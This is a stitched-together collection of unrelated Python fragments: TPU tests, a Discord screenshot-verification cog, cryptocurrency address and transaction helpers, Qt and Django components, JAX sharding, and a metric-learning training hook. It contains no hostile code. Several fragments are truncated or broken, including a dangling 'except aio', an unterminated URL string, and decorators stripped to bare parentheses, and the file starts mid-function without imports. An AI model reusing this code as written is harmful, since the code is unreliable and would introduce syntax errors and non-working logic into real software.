        with patch.object(sys, 'argv', testargs):
            start = time()
            xla_spawn.main()
            end = time()
            result = get_results(tmp_dir)
            self.assertGreaterEqual(result['eval_accuracy'], 0.75)
            # Guard against TPU runs silently degrading to very slow execution.
            self.assertLess((end - start), 500)

    def test_trainer_tpu(self):
        """Smoke-run the trainer test module under xla_spawn on 8 cores."""
        import xla_spawn
        testargs = '\n ./tests/test_trainer_tpu.py\n --num_cores=8\n ./tests/test_trainer_tpu.py\n '.split()
        with patch.object(sys, 'argv', testargs):
            xla_spawn.main()
class Ssverification(Cog):
    """Screenshot-verification cog: OCRs screenshots posted in configured
    channels via an external FastAPI service and grants a role once the
    required number of screenshots is verified.

    NOTE(review): listener decorators in this copy are reduced to bare ``()``
    lines and one except clause is truncated to ``except aio`` (presumably
    ``except aiohttp.ContentTypeError``) -- restore before running.
    """

    def __init__(self, bot: Quotient):
        self.bot = bot
        self.request_url = (self.bot.config.FASTAPI_URL + '/ocr')
        self.headers = {'authorization': self.bot.config.FASTAPI_KEY, 'Content-Type': 'application/json'}
        # Per-member and per-guild rate limiters, plus a lock so only one OCR
        # request is in flight at a time.
        self.__mratelimiter = MemberLimits(QuotientRatelimiter)
        self.__gratelimiter = GuildLimits(QuotientRatelimiter)
        self.__verify_lock = asyncio.Lock()

    async def __check_ratelimit(self, message: discord.Message):
        # Returns False (and notifies the user) when either limiter trips.
        if (retry := self.__mratelimiter[message.author].is_ratelimited(message.author)):
            (await message.reply(embed=discord.Embed(color=discord.Color.red(), description=f'**You are too fast. Kindly resend after `{retry:.2f}` seconds.**')))
            return False
        elif (retry := self.__gratelimiter[message.guild].is_ratelimited(message.guild)):
            (await message.reply(embed=discord.Embed(color=discord.Color.red(), description=f'**Many users are submitting screenshots from this server at this time. Kindly retry after `{retry:.2f}` seconds.**')))
            return False
        return True

    ()
    async def on_message(self, message: discord.Message):
        """Handle a screenshot submission posted in a registered ssverify channel."""
        # Ignore DMs, bots, and channels not registered for verification.
        if (not all((message.guild, (not message.author.bot), (message.channel.id in self.bot.cache.ssverify_channels)))):
            return
        record = (await SSVerify.get_or_none(channel_id=message.channel.id))
        if (not record):
            # Stale cache entry: the channel config was deleted.
            return self.bot.cache.ssverify_channels.discard(message.channel.id)
        if ('tourney-mod' in (role.name.lower() for role in message.author.roles)):
            return
        ctx: Context = (await self.bot.get_context(message))
        _e = discord.Embed(color=discord.Color.red())
        with suppress(discord.HTTPException):
            if (await record.is_user_verified(message.author.id)):
                _e.description = '**Your screenshots are already verified, kindly move onto next step.**'
                return (await ctx.reply(embed=_e))
            if (not (attachments := self.__valid_attachments(message))):
                _e.description = '**Kindly send screenshots in `png/jpg/jpeg` format only.**'
                return (await ctx.reply(embed=_e))
            if (not (await self.__check_ratelimit(message))):
                return
            if (len(attachments) > record.required_ss):
                _e.description = f'**You only have to send `{record.required_ss}` screenshots but you sent `{len(attachments)}`**'
                return (await ctx.reply(embed=_e))
            _e.color = discord.Color.yellow()
            _e.description = f'Processing your {plural(attachments):screenshot|screenshots}... {emote.loading}'
            m: discord.Message = (await message.reply(embed=_e))
            # Send attachment proxy URLs to the OCR service (serialized by the lock).
            _data = [{'url': _.proxy_url} for _ in attachments]
            start_at = self.bot.current_time
            async with self.__verify_lock:
                async with self.bot.session.post(self.request_url, json=_data, headers=self.headers) as resp:
                    complete_at = self.bot.current_time
                    try:
                        _ocr = (await resp.json())
                    except aio
                        (_e.color, _e.description) = (discord.Color.red(), '**Failed to process your screenshots. Try again later.**')
                        return (await message.reply(embed=_e))
            embed = (await self.__verify_screenshots(ctx, record, [ImageResponse(**_) for _ in _ocr]))
            embed.set_footer(text=f'Time taken: {humanize.precisedelta((complete_at - start_at))}')
            embed.set_author(name=f'Submitted {(await record.data.filter(author_id=ctx.author.id).count())}/{record.required_ss}', icon_url=getattr(ctx.author.display_avatar, 'url', None))
            with suppress(discord.HTTPException):
                (await m.delete())
            (await message.reply(embed=embed))
            # All required screenshots verified -> grant the configured role.
            if (await record.is_user_verified(ctx.author.id)):
                (await message.author.add_roles(discord.Object(id=record.role_id)))
                if record.success_message:
                    _e.title = f'Screenshot Verification Complete'
                    (_e.url, _e.description) = (message.jump_url, record.success_message)
                    return (await message.reply(embed=_e))
                _e.description = f'{ctx.author.mention} Your screenshots are verified, Move to next step.'
                (await message.reply(embed=_e))

    async def __verify_screenshots(self, ctx: Context, record: SSVerify, _ocr: List[ImageResponse]) -> discord.Embed:
        """Run each OCR result through the configured verifier and build a result embed."""
        _e = discord.Embed(color=self.bot.color, description='')
        for _ in _ocr:
            if (not record.allow_same):
                # Duplicate detection via perceptual/difference hashes.
                (b, t) = (await record._match_for_duplicate(_.dhash, _.phash, ctx.author.id))
                if b:
                    _e.description += t
                    continue
            if (record.ss_type == SSType.anyss):
                _e.description += f'''{record.emoji(True)} | Successfully Verified.
'''
                (await record._add_to_data(ctx, _))
            elif (record.ss_type == SSType.yt):
                _e.description += (await record.verify_yt(ctx, _))
            elif (record.ss_type == SSType.insta):
                _e.description += (await record.verify_insta(ctx, _))
            elif (record.ss_type == SSType.loco):
                _e.description += (await record.verify_loco(ctx, _))
            elif (record.ss_type == SSType.rooter):
                _e.description += (await record.verify_rooter(ctx, _))
            elif (record.ss_type == SSType.custom):
                _e.description += (await record.verify_custom(ctx, _))
        return _e

    def __valid_attachments(self, message: discord.Message):
        # Keep only png/jpeg/jpg image attachments.
        return [_ for _ in message.attachments if (_.content_type in ('image/png', 'image/jpeg', 'image/jpg'))]

    ()
    async def on_guild_channel_delete(self, channel: discord.TextChannel):
        """Drop the verification config when its channel is deleted."""
        if (channel.id in self.bot.cache.ssverify_channels):
            record = (await SSVerify.get_or_none(channel_id=channel.id))
            if record:
                (await record.full_delete())

    ()
    async def on_guild_role_delete(self, role: discord.Role):
        """Drop every verification config that granted the deleted role."""
        records = (await SSVerify.filter(role_id=role.id))
        if records:
            for record in records:
                (await record.full_delete())
def address_to_script(addr: str, *, net=None) -> str:
    """Return the output script (hex) that pays to *addr*.

    Handles segwit (bech32) addresses as well as legacy base58 P2PKH/P2SH.

    Raises:
        BitcoinException: for invalid addresses, impossible witness versions,
            or unknown base58 version bytes.
    """
    net = net if net is not None else constants.net
    if not is_address(addr, net=net):
        raise BitcoinException(f'invalid Qtum address: {addr}')
    # Segwit addresses decode to a (witness_version, witness_program) pair.
    witver, witprog = segwit_addr.decode(net.SEGWIT_HRP, addr)
    if witprog is not None:
        if not (0 <= witver <= 16):
            raise BitcoinException(f'impossible witness version: {witver}')
        return construct_script([witver, bytes(witprog)])
    # Legacy base58: dispatch on the version byte.
    addrtype, h160 = b58_address_to_hash160(addr)
    if addrtype == net.ADDRTYPE_P2PKH:
        return pubkeyhash_to_p2pkh_script(h160.hex())
    if addrtype == net.ADDRTYPE_P2SH:
        return construct_script([opcodes.OP_HASH160, h160, opcodes.OP_EQUAL])
    raise BitcoinException(f'unknown address type: {addrtype}')
def test_cli_async_map(runner, reactor, server, capsys):
    """async-map should overlap requests: four fetches (one delayed 5s) must
    finish within the 6s Timer, i.e. bounded by the slowest, not the sum."""
    # NOTE(review): the base_url literal below is truncated in this copy of the
    # file -- restore the URL template before running.
    base_url = '
    in_stream = ''.join((base_url.format(i) for i in [1, 1, 5, 1]))
    args = ['--exec-before', 'import datetime; now=datetime.datetime.now; START_TIME=now()', 'async-map', 'await asks.get ! f"{types.SimpleNamespace(**x.json()).delay}"']
    expected = '1\n1\n5\n1\n'
    with helpers.Timer(6.0):
        output = helpers.run(args, input=in_stream.encode()).decode()
    # Output order matches input order despite concurrent execution.
    assert (output == expected)
class AnimatedToggle(Toggle):
    """Toggle switch with an animated sliding handle and a brief 'pulse' flash
    on state change.

    NOTE(review): the '(int)' line below is presumably a stripped slot
    decorator (e.g. '@Slot(int)'), and the pulse_unchecked_color default looks
    truncated -- restore before running.
    """
    # Shared pens: invisible outline for filled shapes, grey outline for the handle.
    _transparent_pen = QPen(Qt.transparent)
    _light_grey_pen = QPen(Qt.lightGray)

    def __init__(self, *args, pulse_unchecked_color='#', pulse_checked_color='#4400B0EE', **kwargs):
        self._pulse_radius = 0
        super().__init__(*args, **kwargs)
        # Slide the handle (200ms), then pulse (350ms), as one sequential group.
        self.animation = QPropertyAnimation(self, b'handle_position', self)
        self.animation.setEasingCurve(QEasingCurve.InOutCubic)
        self.animation.setDuration(200)
        self.pulse_anim = QPropertyAnimation(self, b'pulse_radius', self)
        self.pulse_anim.setDuration(350)
        self.pulse_anim.setStartValue(10)
        self.pulse_anim.setEndValue(20)
        self.animations_group = QSequentialAnimationGroup()
        self.animations_group.addAnimation(self.animation)
        self.animations_group.addAnimation(self.pulse_anim)
        self._pulse_unchecked_animation = QBrush(QColor(pulse_unchecked_color))
        self._pulse_checked_animation = QBrush(QColor(pulse_checked_color))

    (int)
    def handle_state_change(self, value):
        # Restart the slide+pulse sequence toward the new checked state.
        self.animations_group.stop()
        if value:
            self.animation.setEndValue(1)
        else:
            self.animation.setEndValue(0)
        self.animations_group.start()

    def paintEvent(self, e: QPaintEvent):
        """Paint the bar, the optional pulse circle, and the handle."""
        contRect = self.contentsRect()
        handleRadius = round((0.24 * contRect.height()))
        p = QPainter(self)
        p.setRenderHint(QPainter.Antialiasing)
        p.setPen(self._transparent_pen)
        barRect = QRectF(0, 0, (contRect.width() - handleRadius), (0.4 * contRect.height()))
        barRect.moveCenter(contRect.center())
        rounding = (barRect.height() / 2)
        # Handle x-position interpolated along the trail by _handle_position (0..1).
        trailLength = (contRect.width() - (2 * handleRadius))
        xPos = ((contRect.x() + handleRadius) + (trailLength * self._handle_position))
        if (self.pulse_anim.state() == QPropertyAnimation.Running):
            p.setBrush((self._pulse_checked_animation if self.isChecked() else self._pulse_unchecked_animation))
            p.drawEllipse(QPointF(xPos, barRect.center().y()), self._pulse_radius, self._pulse_radius)
        if self.isChecked():
            p.setBrush(self._bar_checked_brush)
            p.drawRoundedRect(barRect, rounding, rounding)
            p.setBrush(self._handle_checked_brush)
        else:
            p.setBrush(self._bar_brush)
            p.drawRoundedRect(barRect, rounding, rounding)
            p.setPen(self._light_grey_pen)
            p.setBrush(self._handle_brush)
        p.drawEllipse(QPointF(xPos, barRect.center().y()), handleRadius, handleRadius)
        p.end()
def interpret_dc_type(field_type):
    """Map a dataclass field annotation to a concrete runtime type.

    ``Any`` falls back to ``str``; ``Optional[T]`` / ``Union[T, None]`` is
    unwrapped to ``T``; every other annotation is returned unchanged.

    Raises:
        RuntimeError: if a string (forward reference) is given instead of a type.
    """
    if isinstance(field_type, str):
        raise RuntimeError('field should be a type')
    if field_type == Any:
        # Any carries no runtime information; default to str.
        return str
    rendered = str(field_type)
    looks_optional = (
        rendered.startswith('typing.Optional')
        or re.match('(typing.|^)Union\\[(.*), NoneType\\]$', rendered) is not None
    )
    if looks_optional:
        # Unwrap Optional[T] / Union[T, None] to its first argument T.
        return field_type.__args__[0]
    return field_type
def user_view(user, password=None):
    """Serialize *user* into the API 'user' representation.

    When *password* is supplied, its encrypted form is included under
    ``encrypted_password``.
    """
    view = {
        'kind': 'user',
        'name': user.username,
        'username': user.username,
        'email': user.email,
        'verified': user.verified,
        'avatar': avatar.get_data_for_user(user),
        'super_user': usermanager.is_superuser(user.username),
        'enabled': user.enabled,
    }
    if password is not None:
        # Only expose the (encrypted) password when explicitly provided.
        view['encrypted_password'] = authentication.encrypt_user_password(password).decode('ascii')
    return view
def convert_raw_tx_to_hex(raw: Union[(str, bytes)]) -> str:
    """Normalize a raw transaction, given in any common encoding, to a hex string.

    Tries, in order: hex (surrounding whitespace allowed), base43 (Electrum's
    QR-friendly encoding), and base64 for PSBTs (``cHNidP`` prefix). Raw bytes
    that match no text encoding are returned as their hex form.

    Raises:
        ValueError: if *raw* is empty or no encoding could be recognized.
    """
    if (not raw):
        raise ValueError('empty string')
    raw_unstripped = raw
    raw = raw.strip()
    # Hex first -- the most common encoding.
    # Fix: use `except Exception` instead of bare `except`, which also swallowed
    # SystemExit/KeyboardInterrupt.
    try:
        return binascii.unhexlify(raw).hex()
    except Exception:
        pass
    try:
        return base_decode(raw, base=43).hex()
    except Exception:
        pass
    # 'cHNidP' is base64("psbt\xff") -- the PSBT magic prefix.
    if (raw[0:6] in ('cHNidP', b'cHNidP')):
        try:
            return base64.b64decode(raw).hex()
        except Exception:
            pass
    if isinstance(raw_unstripped, bytes):
        # No text encoding matched; assume the bytes are already the raw tx.
        return raw_unstripped.hex()
    raise ValueError(f'failed to recognize transaction encoding for txt: {raw[:30]}...')
class JobDetail(JobMixin, DetailView):
    """Detail page for a single job posting."""

    def get_queryset(self):
        # Board admins see every job; authenticated users see visible jobs plus
        # their own; everyone else sees only visible jobs.
        queryset = Job.objects.select_related()
        if self.has_jobs_board_admin_access():
            return queryset
        if self.request.user.is_authenticated:
            return (queryset.visible() | queryset.by(self.request.user))
        return queryset.visible()

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        # Up to five jobs from the same category for the sidebar.
        context['category_jobs'] = self.object.category.jobs.select_related('category')[:5]
        # Edit is allowed for the creator or a board admin, and only while editable.
        context['user_can_edit'] = (((self.object.creator == self.request.user) or self.has_jobs_board_admin_access()) and self.object.editable)
        context['job_review_form'] = JobReviewCommentForm(initial={'job': self.object})
        return context
def mlp(dim, hidden_dim, output_dim, layers=1, batch_norm=False):
    """Build a multi-layer perceptron as an ``nn.Sequential``.

    Layout: input Linear block, then ``layers`` hidden blocks, then the output
    Linear. Every non-output Linear is followed by ReLU, with a BatchNorm1d
    inserted before the ReLU when ``batch_norm`` is set.

    Args:
        dim: input feature dimension.
        hidden_dim: width of the hidden layers.
        output_dim: output feature dimension.
        layers: number of hidden blocks after the input block.
        batch_norm: insert BatchNorm1d after each non-output Linear.

    Returns:
        nn.Sequential implementing the MLP.
    """
    # Refactor: the original duplicated the whole construction across the
    # batch_norm branches; build one Linear(+BN)+ReLU block in a single place.
    def _block(in_dim):
        block = [nn.Linear(in_dim, hidden_dim)]
        if batch_norm:
            block.append(nn.BatchNorm1d(num_features=hidden_dim))
        block.append(nn.ReLU(inplace=True))
        return block

    seq = _block(dim)
    for _ in range(layers):
        seq += _block(hidden_dim)
    seq += [nn.Linear(hidden_dim, output_dim)]
    return nn.Sequential(*seq)
# NOTE(review): the decorator below lost its '@pytest.mark' prefix in this copy
# of the file -- restore before running.
.skipif((sys.implementation.name != 'cpython'), reason='Only makes sense with refcounting GC')
def test_ExceptionGroup_catch_doesnt_create_cyclic_garbage() -> None:
    """Catching an ExceptionGroup must not leave reference cycles for the GC."""
    gc.collect()
    old_flags = gc.get_debug()

    def make_multi() -> NoReturn:
        # Build a group of two pre-raised exceptions and raise it.
        raise ExceptionGroup('', [get_exc(raiser1), get_exc(raiser2)])
    try:
        # DEBUG_SAVEALL keeps every collectable object in gc.garbage, so any
        # cycle created by the except machinery becomes visible below.
        gc.set_debug(gc.DEBUG_SAVEALL)
        with pytest.raises(ExceptionGroup) as excinfo:
            raise make_multi()
        for exc in excinfo.value.exceptions:
            assert isinstance(exc, (ValueError, KeyError))
        gc.collect()
        assert (not gc.garbage)
    finally:
        # Always restore GC debug flags and drop the saved garbage.
        gc.set_debug(old_flags)
        gc.garbage.clear()
class DamagePattern():
    """Service facade over the eos damage-pattern storage (singleton).

    NOTE(review): most methods here take no ``self``/``cls`` yet are used with
    arguments -- @staticmethod/@classmethod decorators appear to have been
    stripped from this copy of the file; confirm against upstream before editing.
    """
    # Lazily created singleton (see getInstance).
    instance = None

    def getInstance(cls):
        if (cls.instance is None):
            cls.instance = DamagePattern()
        return cls.instance

    def getUserDamagePatternList():
        return eos.db.getDamagePatternList()

    def getBuiltinDamagePatternList():
        return es_DamagePattern.getBuiltinList()

    def getDamagePattern(name):
        return eos.db.getDamagePattern(name)

    def newPattern(name):
        # New patterns start with all four damage values at zero.
        p = es_DamagePattern(0, 0, 0, 0)
        p.rawName = name
        eos.db.save(p)
        return p

    def renamePattern(p, newName):
        p.rawName = newName
        eos.db.save(p)

    def deletePattern(p):
        eos.db.remove(p)

    def copyPattern(p):
        newP = copy.deepcopy(p)
        eos.db.save(newP)
        return newP

    def saveChanges(p):
        eos.db.save(p)

    def importPatterns(self, text):
        """Import patterns from clipboard text; raise ImportError on any failure."""
        (imports, num) = es_DamagePattern.importPatterns(text)
        lenImports = len(imports)
        if (lenImports == 0):
            raise ImportError('No patterns found for import')
        if (lenImports != num):
            # NOTE(review): message formats `num` as the imported count and
            # `num - lenImports` as the error count -- the operands look
            # swapped/negated; verify against es_DamagePattern.importPatterns.
            raise ImportError(('%d patterns imported from clipboard; %d had errors' % (num, (num - lenImports))))

    def exportPatterns(self):
        """Export user patterns (minus the built-in placeholders), sorted by name."""
        patterns = self.getUserDamagePatternList()
        # Iterate backwards so deleting by index stays safe.
        for i in range((len(patterns) - 1), (- 1), (- 1)):
            if (patterns[i].name in ('Uniform', 'Selected Ammo')):
                del patterns[i]
        patterns.sort(key=(lambda p: p.fullName))
        return es_DamagePattern.exportPatterns(*patterns)
def schedule_threshold(step: int, total_step: int, warmup_steps: int, initial_threshold: float, final_threshold: float, initial_warmup: int, final_warmup: int, final_lambda: float):
    """Movement-pruning style threshold schedule.

    Holds ``initial_threshold`` during warmup, ``final_threshold`` during the
    final cooldown, and interpolates cubically in between. The regularization
    weight scales proportionally with the current threshold.

    Returns:
        (threshold, regu_lambda) for the given *step*.
    """
    warmup_end = initial_warmup * warmup_steps
    cooldown_start = total_step - final_warmup * warmup_steps
    if step <= warmup_end:
        threshold = initial_threshold
    elif step > cooldown_start:
        threshold = final_threshold
    else:
        # Cubic decay from the initial to the final threshold over the
        # middle segment of training.
        schedule_span = total_step - (final_warmup + initial_warmup) * warmup_steps
        mul_coeff = 1 - (step - warmup_end) / schedule_span
        threshold = final_threshold + (initial_threshold - final_threshold) * (mul_coeff ** 3)
    regu_lambda = (final_lambda * threshold) / final_threshold
    return (threshold, regu_lambda)
def _create_gda(partitioner: partitioning.BasePartitioner, global_shapes: PyTreeDef, host_arrays: PyTreeDef) -> PyTreeDef:
    """Shard host-local numpy arrays into global device arrays.

    For every leaf in *host_arrays*, splits the host-local data along axis 0,
    places the shards onto this host's local devices according to the
    partitioner's mesh and data partition spec, and assembles either a
    ``jax.Array`` (when ``jax.config.jax_array`` is on) or a legacy
    ``GlobalDeviceArray``.
    """
    global_mesh = partitioner.mesh
    axes = partitioner.data_partition_spec
    local_devices = global_mesh.local_devices
    local_device_count = jax.local_device_count()

    def _put_to_devices(x, global_shape):
        # Which global index-slices each device owns, then inverted into
        # host->indices and index->devices mappings.
        device_to_idxs = gda_lib.get_shard_indices(global_shape, global_mesh, axes)
        (host_to_idxs, idx_to_devices) = _get_index_mappings(device_to_idxs)
        shard_length = gda_lib.get_shard_shape(global_shape, global_mesh, axes)[0]
        num_shards = (len(x) // shard_length)
        try:
            local_array_shards = np.split(x, num_shards, axis=0)
        except ValueError as array_split_error:
            raise ValueError(f'Unable to put to devices shape {x.shape} with local device count {local_device_count}') from array_split_error
        # Assign each local device the index of the shard it should receive.
        # NOTE(review): indentation in this copy is ambiguous -- confirm whether
        # `i` increments per device or per index slice against upstream.
        device_to_split_array_idx = {}
        i = 0
        for idx in host_to_idxs[jax.process_index()]:
            assert (idx in idx_to_devices)
            for d in idx_to_devices[idx]:
                device_to_split_array_idx[d] = (i % len(local_array_shards))
                i += 1
        device_buffers = []
        for d in local_devices:
            assert (d in device_to_split_array_idx)
            i = device_to_split_array_idx[d]
            device_buffers.append(jax.device_put(local_array_shards[i], d))
        return device_buffers
    device_buffers = jax.tree_map(_put_to_devices, host_arrays, global_shapes)

    def _gda(dbs, global_shape):
        # New-style jax.Array path vs legacy GlobalDeviceArray.
        if jax.config.jax_array:
            return jax.make_array_from_single_device_arrays(global_shape, jax.sharding.NamedSharding(global_mesh, axes), dbs)
        else:
            return GlobalDeviceArray(global_shape, global_mesh, axes, dbs)
    return jax.tree_map(_gda, device_buffers, global_shapes, is_leaf=(lambda x: isinstance(x, (list, tuple))))
class HookContainer():
    """Glue between a record keeper and a metric-learning trainer/tester loop.

    Logs per-iteration statistics, runs evaluation and checkpointing at epoch
    boundaries, and tracks the best epoch according to `primary_metric` on the
    `validation_split_name` split.
    """

    def __init__(self, record_keeper, record_group_name_prefix=None, primary_metric='mean_average_precision_at_r', validation_split_name='val', save_models=True):
        # record_keeper: persistence backend (update_records / query / save_records).
        # record_group_name_prefix: optional prefix for all record-group names.
        # primary_metric: accuracy key that decides which epoch is "best".
        # save_models: master switch for writing/deleting checkpoints on disk.
        self.record_keeper = record_keeper
        self.record_group_name_prefix = record_group_name_prefix
        # Trainer attributes whose contents get saved/loaded as checkpoints.
        self.saveable_trainer_objects = ['models', 'optimizers', 'lr_schedulers', 'loss_funcs', 'mining_funcs']
        self.primary_metric = primary_metric
        self.validation_split_name = validation_split_name
        self.do_save_models = save_models

    def end_of_iteration_hook(self, trainer):
        """Record losses, loss weights, and the state of every trainer component."""
        record_these = [[trainer.loss_tracker.losses, {'input_group_name_for_non_objects': 'loss_histories'}], [trainer.loss_tracker.loss_weights, {'input_group_name_for_non_objects': 'loss_weights'}], [trainer.loss_funcs, {'recursive_types': [torch.nn.Module]}], [trainer.mining_funcs, {}], [trainer.models, {}], [trainer.optimizers, {'custom_attr_func': self.optimizer_custom_attr_func}]]
        for (record, kwargs) in record_these:
            self.record_keeper.update_records(record, trainer.get_global_iteration(), **kwargs)

    def end_of_epoch_hook(self, tester, dataset_dict, model_folder, test_interval=1, patience=None, splits_to_eval=None, test_collate_fn=None):
        """Return a hook that evaluates/saves every `test_interval` epochs.

        The returned hook yields False (stop training) once `patience` epochs
        pass without the primary metric improving.
        """
        # Fail fast if the configured metric is not computed by the tester.
        if (self.primary_metric not in tester.accuracy_calculator.get_curr_metrics()):
            raise ValueError('HookContainer `primary_metric` must be one of: {}'.format(tester.accuracy_calculator.get_curr_metrics()))
        if (not os.path.exists(model_folder)):
            os.makedirs(model_folder)
        def actual_hook(trainer):
            # Only test on epochs that are multiples of test_interval.
            continue_training = True
            if ((trainer.epoch % test_interval) == 0):
                best_epoch = self.save_models_and_eval(trainer, dataset_dict, model_folder, test_interval, tester, splits_to_eval, test_collate_fn)
                continue_training = self.patience_remaining(trainer.epoch, best_epoch, patience)
            return continue_training
        return actual_hook

    def end_of_testing_hook(self, tester):
        """Persist per-split accuracies plus the running best epoch/accuracy."""
        for (split_name, accuracies) in tester.all_accuracies.items():
            epoch = accuracies['epoch']
            self.record_keeper.update_records(accuracies, epoch, input_group_name_for_non_objects=self.record_group_name(tester, split_name))
            (_, _, best_epoch, best_accuracy) = self.is_new_best_accuracy(tester, split_name, epoch)
            best = {'best_epoch': best_epoch, 'best_accuracy': best_accuracy}
            self.record_keeper.update_records(best, epoch, input_group_name_for_non_objects=self.record_group_name(tester, split_name))

    def load_latest_saved_models(self, trainer, model_folder, device=None, best=False):
        """Restore trainer state from disk; return the epoch to resume from."""
        if (device is None):
            device = torch.device(('cuda' if torch.cuda.is_available() else 'cpu'))
        # The trunk checkpoint's version number identifies the latest epoch.
        (resume_epoch, model_suffix) = c_f.latest_version(model_folder, 'trunk_*.pth', best=best)
        if (resume_epoch > 0):
            for obj_dict in [getattr(trainer, x, {}) for x in self.saveable_trainer_objects]:
                c_f.load_dict_of_models(obj_dict, model_suffix, model_folder, device, log_if_successful=True)
        return (resume_epoch + 1)

    def save_models(self, trainer, model_folder, curr_suffix, prev_suffix=None):
        """Save all saveable trainer objects; optionally delete a prior version."""
        if self.do_save_models:
            for obj_dict in [getattr(trainer, x, {}) for x in self.saveable_trainer_objects]:
                c_f.save_dict_of_models(obj_dict, curr_suffix, model_folder)
                if (prev_suffix is not None):
                    c_f.delete_dict_of_models(obj_dict, prev_suffix, model_folder)

    def save_models_and_eval(self, trainer, dataset_dict, model_folder, test_interval, tester, splits_to_eval=None, collate_fn=None):
        """Run the tester, step plateau schedulers, checkpoint, and track 'best'.

        Returns the best epoch seen so far on the validation split.
        """
        epoch = trainer.epoch
        tester.test(dataset_dict, epoch, trainer.models['trunk'], trainer.models['embedder'], splits_to_eval, collate_fn)
        # Snapshot the previous best before this epoch's results are considered.
        (prev_best_epoch, _) = self.get_best_epoch_and_accuracy(tester, self.validation_split_name)
        (is_new_best, curr_accuracy, best_epoch, best_accuracy) = self.is_new_best_accuracy(tester, self.validation_split_name, epoch)
        self.record_keeper.save_records()
        trainer.step_lr_plateau_schedulers(curr_accuracy)
        # Regular rolling checkpoint: keep current, drop the previous interval's.
        self.save_models(trainer, model_folder, epoch, (epoch - test_interval))
        if is_new_best:
            c_f.LOGGER.info('New best accuracy! {}'.format(curr_accuracy))
            curr_suffix = ('best%d' % best_epoch)
            prev_suffix = (('best%d' % prev_best_epoch) if (prev_best_epoch is not None) else None)
            # Separate "best" checkpoint, replacing the previous best.
            self.save_models(trainer, model_folder, curr_suffix, prev_suffix)
        return best_epoch

    def is_new_best_accuracy(self, tester, split_name, epoch):
        """Compare this epoch's primary metric against the stored best."""
        curr_accuracy = self.get_curr_primary_metric(tester, split_name)
        (best_epoch, best_accuracy) = self.get_best_epoch_and_accuracy(tester, split_name)
        is_new_best = False
        # best_epoch is None means no prior record: the first epoch always wins.
        if ((curr_accuracy > best_accuracy) or (best_epoch is None)):
            (best_epoch, best_accuracy) = (epoch, curr_accuracy)
            is_new_best = True
        return (is_new_best, curr_accuracy, best_epoch, best_accuracy)

    def get_loss_history(self, loss_names=()):
        """Query recorded loss histories; empty `loss_names` selects all columns."""
        columns = ('*' if (len(loss_names) == 0) else ', '.join(loss_names))
        table_name = 'loss_histories'
        if (not self.record_keeper.table_exists(table_name)):
            return {}
        output = self.record_keeper.query('SELECT {} FROM {}'.format(columns, table_name), return_dict=True)
        # Drop the database's internal row id.
        output.pop('id', None)
        return output

    def get_accuracy_history(self, tester, split_name, return_all_metrics=False, metrics=()):
        """Query the accuracy table for a split; defaults to the primary metric."""
        table_name = self.record_group_name(tester, split_name)
        if (not self.record_keeper.table_exists(table_name)):
            return {}
        def get_accuracies(keys):
            keys = ('*' if return_all_metrics else ('epoch, %s' % keys))
            query = 'SELECT {} FROM {}'.format(keys, table_name)
            return self.record_keeper.query(query, return_dict=True)
        keys = (metrics if (len(metrics) > 0) else [self.primary_metric])
        output = self.try_keys(keys, tester, get_accuracies)
        output.pop('id', None)
        return output

    def get_curr_primary_metric(self, tester, split_name):
        """Read the primary metric for `split_name` from the tester's last run."""
        def get_curr(key):
            return tester.all_accuracies[split_name][key]
        return self.try_primary_metric(tester, get_curr)

    def try_keys(self, input_keys, tester, input_func):
        """Call `input_func` with averaged, then non-averaged, metric key names.

        The stored column name depends on whether accuracies were averaged, so
        both spellings are attempted before giving up with KeyError.
        """
        for average in [True, False]:
            keys = ', '.join([tester.accuracies_keyname(k, average=average, label_hierarchy_level=tester.label_hierarchy_level) for k in input_keys])
            try:
                return input_func(keys)
            except (KeyError, sqlite3.OperationalError):
                pass
        raise KeyError

    def try_primary_metric(self, tester, input_func):
        # Convenience wrapper of try_keys for the single primary metric.
        return self.try_keys([self.primary_metric], tester, input_func)

    def get_accuracies_of_epoch(self, tester, split_name, epoch, select_all=True):
        """Return the recorded accuracy row(s) for one specific epoch."""
        table_name = self.record_group_name(tester, split_name)
        if (not self.record_keeper.table_exists(table_name)):
            return []
        def get_accuracies(key):
            columns = ('*' if select_all else ('epoch, %s' % key))
            query = ('SELECT %s FROM %s WHERE epoch=?' % (columns, table_name))
            return self.record_keeper.query(query, (epoch,))
        return self.try_primary_metric(tester, get_accuracies)

    def get_accuracies_of_best_epoch(self, tester, split_name, select_all=True, ignore_epoch=((- 1),)):
        """Return (rows, metric_key) for the epoch with the highest primary metric.

        `ignore_epoch` epochs are excluded (e.g. -1, used for untrained models).
        """
        table_name = self.record_group_name(tester, split_name)
        if (not self.record_keeper.table_exists(table_name)):
            return ([], None)
        def get_accuracies(key):
            columns = ('*' if select_all else ('epoch, %s' % key))
            params = ', '.join((['?'] * len(ignore_epoch)))
            query = 'SELECT {0} FROM {1} WHERE {2}=\n    (SELECT max({2}) FROM {1} WHERE epoch NOT IN ({3}))\n    AND epoch NOT IN ({3})'.format(columns, table_name, key, params)
            # ignore_epoch is bound twice: once per IN (...) clause above.
            output = self.record_keeper.query(query, (ignore_epoch + ignore_epoch))
            return (output, key)
        return self.try_primary_metric(tester, get_accuracies)

    def get_best_epoch_and_accuracy(self, tester, split_name, ignore_epoch=((- 1),)):
        """Return (best_epoch, best_accuracy), or (None, 0) when nothing stored."""
        (accuracies, key) = self.get_accuracies_of_best_epoch(tester, split_name, select_all=False, ignore_epoch=ignore_epoch)
        if (len(accuracies) > 0):
            return (accuracies[0]['epoch'], accuracies[0][key])
        return (None, 0)

    def patience_remaining(self, epoch, best_epoch, patience):
        """False once more than `patience` epochs pass without a new best."""
        if ((patience is not None) and (best_epoch is not None)):
            if ((epoch - best_epoch) > patience):
                c_f.LOGGER.info('Validation accuracy has plateaued. Exiting.')
                return False
        return True

    def run_tester_separately(self, tester, dataset_dict, epoch, trunk, embedder, splits_to_eval=None, collate_fn=None, skip_eval_if_already_done=True):
        """Run the tester outside the training loop; returns False if skipped."""
        if skip_eval_if_already_done:
            splits_to_eval = self.get_splits_to_eval(tester, dataset_dict, epoch, splits_to_eval)
            if (len(splits_to_eval) == 0):
                c_f.LOGGER.info('Already evaluated')
                return False
        tester.test(dataset_dict, epoch, trunk, embedder, splits_to_eval, collate_fn)
        return True

    def get_splits_to_eval(self, tester, dataset_dict, epoch, input_splits_to_eval):
        """Filter requested splits down to those not yet evaluated at `epoch`."""
        input_splits_to_eval = (list(dataset_dict.keys()) if (input_splits_to_eval is None) else input_splits_to_eval)
        splits_to_eval = []
